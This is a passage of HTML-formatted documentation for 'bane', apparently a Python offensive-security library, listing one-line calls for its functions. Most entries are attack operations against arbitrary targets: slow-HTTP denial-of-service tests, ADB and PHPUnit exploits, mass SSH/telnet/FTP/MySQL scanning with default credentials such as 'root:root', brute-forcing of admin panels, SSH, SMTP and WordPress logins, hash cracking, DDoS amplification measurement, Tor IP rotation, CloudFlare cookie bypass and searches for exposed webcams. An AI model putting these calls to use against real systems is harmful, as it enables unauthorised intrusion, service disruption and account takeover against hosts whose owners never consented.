<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.slow_get_test(IP , port=80, duration=180 )
</pre></div><h4>Maximum number of allowed connections from a single host:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )
</pre></div><h4>Slow POST test:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.slow_post_test(IP , port=80, duration=180 )
</pre></div><h4>Slow Read test:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.slow_read_test(IP , port=80, duration=180 )

</pre></div><h4>Android Debug Bridge (ADB) exploit:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.adb_exploit(IP , timeout=5 )

</pre></div><h4>Exposed unauthenticated Telnet server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.exposed_telnet(IP , timeout=5 )

</pre></div><h4>Exposed "/.env" File:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.exposed_env(link , timeout=15 )

</pre></div><h4>Vulners API Search for known vulnerabilities on a particular software:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.vulners_search("wordpress",version="4.7.4")#just an example


</pre></div><h4>PHPUNIT exploit:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.phpunit_exploit(link , timeout=15 )

</pre></div><h4>Shodan report:</h4>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">api_key="ghbjklmjklmjlkml...."
<br>bane.shodan_report(IP , api_key)
</pre></div>

# Proxies collecting:

</pre></div><h4>Mass HTTP proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.masshttp()
</pre></div><h4>Mass SOCKS4 proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.massocks4()
</pre></div><h4>Mass SOCKS5 proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.massocks5()
</pre></div><h4>Some HTTP proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.http()
</pre></div><h4>Some HTTPS proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.https()
</pre></div><h4>Some SOCKS4 proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.socks4()
</pre></div><h4>Some SOCKS5 proxies gathering:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.socks5()
</pre></div><h4>Checking proxy:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.proxy_check(IP , port , proto="http" , timeout=5)
</pre></div>

# IoTs mass scanning:

</pre></div><h4>Mass ssh scanning: (if you are on Windows OS, please install Putty)</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.mass_scan(threads=100 , protocol="ssh" , word_list= ["root:root","admin:admin"] )
</pre></div><h4>Mass telnet scanning:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.mass_scan(threads=100 , protocol="telnet" , word_list= ["root:root","admin:admin"] )
</pre></div><h4>Mass ftp scanning:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.mass_scan(threads=100 , protocol="ftp" , word_list= ["root:root","admin:admin"] )
</pre></div><h4>Mass MySQL scanning:</h4>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.mass_scan(threads=100 , protocol="mysql" , word_list= ["root:root","admin:admin"] )
</pre></div><h4>Mass Android Debug Bridge (ADB) exploit:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.mass_scan(threads=100 , protocol="adb" )
</pre></div>

# Extract information from page:

</pre></div><h4>Parse all forms in the page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.forms_parser(link , timeout=10 )
</pre></div><h4>Get all page inputs and their values:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.inputs(link , value=True , timeout=10 )
</pre></div><h4>Get all page forms and their values:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.forms(link , value=True , timeout=10 )
</pre></div><h4>Get login form:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.loginform(link , value=True , timeout=10 )
</pre></div><h4>Get all links on the page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.crawl(link , timeout=10 )
</pre></div><h4>Get all paths on the page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.pather(link , timeout=10 )
</pre></div><h4>Get all social media and external links on the page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.media(link , timeout=10 )
</pre></div><h4>Get all subdomains links on the page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.subdomains_extract(link , timeout=10 )
</pre></div>

# Information gathering:

</pre></div><h4>Get banner:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.get_banner(IP , p=port , payload=None , timeout=5 )
</pre></div><h4>Get infomation about Domain or IP:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.info(IP , timeout=15 )
</pre></div><h4>safeweb.norton.com report for a link:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.norton_rate(link , timeout=15 )
</pre></div><h4>Your IP address:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.myip()
</pre></div><h4>WHOIS:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.who_is( domain )
</pre></div><h4>GEO-Information for any IP:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.geoip( IP )
</pre></div><h4>HTTP headers:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.headers( link )
</pre></div><h4>Reverse IP Lookup:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.reverse_ip_lookup( IP )
</pre></div><h4>Resolve any domain using a specific DNS server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.resolve( domain , server="8.8.8.8" )
</pre></div><h4>Very Fast port scan:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result
</pre></div><h4>Subdomains finder:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.subdomains_finder( domain )

</pre></div>

# Encryption & Hashing:

</pre></div><h4>XOR:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.xor_hash( data, key )
</pre></div><h4>Caesar:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.caesar_hash( data, key )
</pre></div><h4>MD5:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.md5_hash( data )
</pre></div><h4>SHA1:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha1_hash( data )
</pre></div><h4>SHA224:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha224_hash( data )
</pre></div><h4>SHA256:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha256_hash( data )
</pre></div><h4>SHA384:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha384_hash( data )
</pre></div><h4>SHA512:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha512_hash( data )
</pre></div><h4>Base64 encoding:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.base64_encode( data )
</pre></div><h4>Base64 decoding:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.base64_decode( data )
</pre></div><h4>File content encryption with XOR:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.xor_file( file , key )
</pre></div><h4>File content encryption with MD5:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.md5_file( file )
</pre></div><h4>File content encryption with SHA1:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha1_file( file )
</pre></div><h4>File content encryption with SHA224:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha224_file( file )
</pre></div><h4>File content encryption with SHA256:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha256_file( file )
</pre></div><h4>File content encryption with SHA384:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha384_file( file )
</pre></div><h4>File content encryption with SHA512:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.sha512_file( file )
</pre></div><h4>File content encoding with base64:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.base64_encode_file( file )
</pre></div><h4>File content decoding with base64:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.base64_decode_file( file )
</pre></div>

# Decryption:

</pre></div><h4>MD5:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
</pre></div><h4>SHA1:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
</pre></div><h4>SHA224:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
</pre></div><h4>SHA256:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
</pre></div><h4>SHA384:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
</pre></div><h4>SHA512:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
</pre></div><h4>Base64:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )
</pre></div><h4>Caesar:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
</pre></div>

# Bruteforcing:

</pre></div><h4>Admin panel on web page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.admin_brute_force(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
</pre></div><h4>FTP server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
</pre></div><h4>SSH server: (if you are on windows, please install Putty)</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
</pre></div><h4>TELNET server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
</pre></div><h4>SMTP server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
</pre></div><h4>MySQL server:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
</pre></div><h4>WordPress login page:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
</pre></div><h4>Admin panel finder:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.admin_panel_finder(link , ext="php" , timeout=15 )
</pre></div><h4>Force browsing pages on admin panel:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.force_browsing(link , ext="php" , timeout=15 )
</pre></div><h4>Filemanager finder:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.filemanager_finder(link , ext="php" , timeout=15 )
</pre></div>

# Amplification factors calculation for some protocols:

</pre></div><h4>DNS:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.dns_factor( IP , timeout=3 )
</pre></div><h4>NTP:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.ntp_factor( IP , timeout=3 )
</pre></div><h4>Memcache:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.memcache_factor( IP , timeout=3 )
</pre></div><h4>Chargen:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.chargen_factor( IP , timeout=3 )
</pre></div><h4>SSDP:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.ssdp_factor( IP , timeout=3 )
</pre></div><h4>SNMP:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.snmp_factor( IP , timeout=3 )
</pre></div><h4>ECHO:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.echo_factor( IP , timeout=3 )
</pre></div>

# Tor IP switching:

</pre></div><h4>Without password: (doesn't work with Windows OS)</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.tor_switch_no_password( interval=30 , logs=True )
</pre></div><h4>Without password: (doesn't work with Windows OS)</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
</pre></div>

# Updating bane:


<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.update(version=None)
</pre></div>

# Some extra useful functions:

</pre></div><h4>Clear a file:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.clear_file( file )
</pre></div><h4>Create a file:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.create_file( file )
</pre></div><h4>Delete a file:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.delete_file( file )
</pre></div><h4>Get content of a file:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.read_file( file )
</pre></div><h4>Get CloudFlare cookie: (you must install NodeJS first)</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.get_cf_cookie( domain , user_agent )
</pre></div><h4>Get HTB invitation:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.HTB_invitation()
</pre></div><h4>Get Facebook account's ID:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.facebook_id( fb_link )
</pre></div><h4>Google dorking:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.google_dorking( dork )
</pre></div><h4>Webhint report's link:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.webhint_report( link )
</pre></div><h4>Youtube search:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.youtube_search( query )
</pre></div><h4>Write to a file:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.write_file( data , file )
</pre></div><h4>Find webcams:</h4>

<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.webcams( count=10 , by={'country':'us'} )
</pre></div>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.webcams( count=10 , by={'type':'axis'} )
</pre></div>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.webcams( count=10 , by={'city':'paris'} )
</pre></div>
<div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%">bane.webcams( count=10 , by={'timezone':'+00:00'} )
</pre></div>